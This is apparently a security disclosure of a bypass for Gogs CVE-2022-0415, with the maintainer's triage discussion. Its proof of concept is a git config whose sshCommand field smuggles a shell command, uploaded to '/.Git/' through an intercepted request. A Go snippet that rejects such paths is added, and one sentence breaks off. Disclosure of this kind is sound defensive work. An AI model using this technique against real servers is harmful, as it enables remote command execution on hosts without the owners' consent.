Bypass to Remote Command Execution in uploading repository file in gogs/gogs
Jun 6th 2022
I found a bypass for CVE-2022-0415 and previous fixes.
In the fix of CVE-2022-0415, gogs filter
/.Git/ can bypass this and upload successfully.
Proof of Concept
Create a repository in Gogs, upload a file config to the repository on the web page:
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
	ignorecase = true
	precomposeunicode = true
	sshCommand = echo pwnned > /tmp/poc
[remote "origin"]
	url = firstname.lastname@example.org:torvalds/linux.git
	fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
	remote = origin
	merge = refs/heads/master
Intercept the HTTP POST form submission request, and set the parameter to tree_path=/.Git/ in the request body.
Then a file with text pwnned is created in host in a github repo https://github.com/cokeBeer/test with name
This vulnerability is capable of executing commands on the remote server and gaining a privileged user account, which leads to sensitive data exposure, identity theft, etc.
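The bypass above works because the earlier filter only matched the lower-case spelling of .git, while the filesystems the report confirms as affected (macOS, Windows) fold case. The check below is an added example written for this report, not Gogs's own code, that rejects a .git component in an upload path regardless of case and after path normalisation; the function names isGitPathComponent and validateUploadPath, and the sample paths in main, are constructed for illustration.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// isGitPathComponent reports whether any component of the supplied
// repository tree path is ".git", compared case-insensitively.
// Hypothetical hardening check written for this report (not Gogs code):
// the bypass relies on a filter that matches ".git" only in its
// lower-case spelling while the host filesystem folds case.
func isGitPathComponent(treePath string) bool {
	// Normalise Windows-style separators so "\.Git\" is seen as well.
	normalized := strings.ReplaceAll(treePath, "\\", "/")
	// path.Clean collapses "//", "./" and resolves "a/../b", so a ".git"
	// reached through ".." is still visible as a plain component.
	cleaned := path.Clean("/" + normalized)
	for _, part := range strings.Split(cleaned, "/") {
		// EqualFold performs Unicode case folding, so ".Git" and ".GIT"
		// (and folded variants) all match.
		if strings.EqualFold(part, ".git") {
			return true
		}
	}
	return false
}

// validateUploadPath returns an error for any tree path that would write
// into a .git directory (in any case) and otherwise returns the cleaned
// path without its leading slash, ready to be joined to the repo root.
func validateUploadPath(treePath string) (string, error) {
	if isGitPathComponent(treePath) {
		return "", fmt.Errorf("invalid tree path %q: uploads into .git are not allowed", treePath)
	}
	cleaned := path.Clean("/" + strings.ReplaceAll(treePath, "\\", "/"))
	return strings.TrimPrefix(cleaned, "/"), nil
}

func main() {
	// Constructed sample inputs: the report's bypass value plus a few variants.
	samples := []string{"/.Git/", ".git/config", "src/.GIT/hooks", "docs/git/", "a/../.Git/x", "src/README.md"}
	for _, p := range samples {
		clean, err := validateUploadPath(p)
		fmt.Printf("%-18q -> rejected=%v clean=%q\n", p, err != nil, clean)
	}
}
```

Because the comparison is made on path components after cleaning rather than on the raw string, the check does not depend on whether the host filesystem is case-sensitive, which is the property the report shows differs between the Linux and macOS/Windows results.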
Thanks for the report!
Could you confirm what systems are affected?
I tested in the latest version of the gogs docker images, so Linux is affected.
Can you record a video for the poc on Linux systems? We weren't able to reproduce it on Linux.
Though we can confirm Windows and macOS are affected because the path is case-insensitive.
Added a video file link in the report; download to play it. I think this way is faster than uploading to a video website, which always needs checking.
Thanks for the video!
We're still not able to reproduce it on Linux, where the .Git directory is simply treated as a regular content directory. In the poc video, there is also no evidence showing that /tmp/poc is created during the recording of the video.
Could you record a video starting from a fresh installation of a fresh pull of gogs/gogs?
Seems the problem doesn't come from the way I operate. The docker's data dir is mounted on my macOS system and may share the case-insensitive feature.
So just exclude Linux. By the way, I found some bugs claimed to be fixed in gogs's changelog but actually existing in the latest version. How can I get in contact without messing up the comments of this report?
Sounds good, marking as valid.
To file bug reports, please go to https://github.com/gogs/gogs/issues/new/choose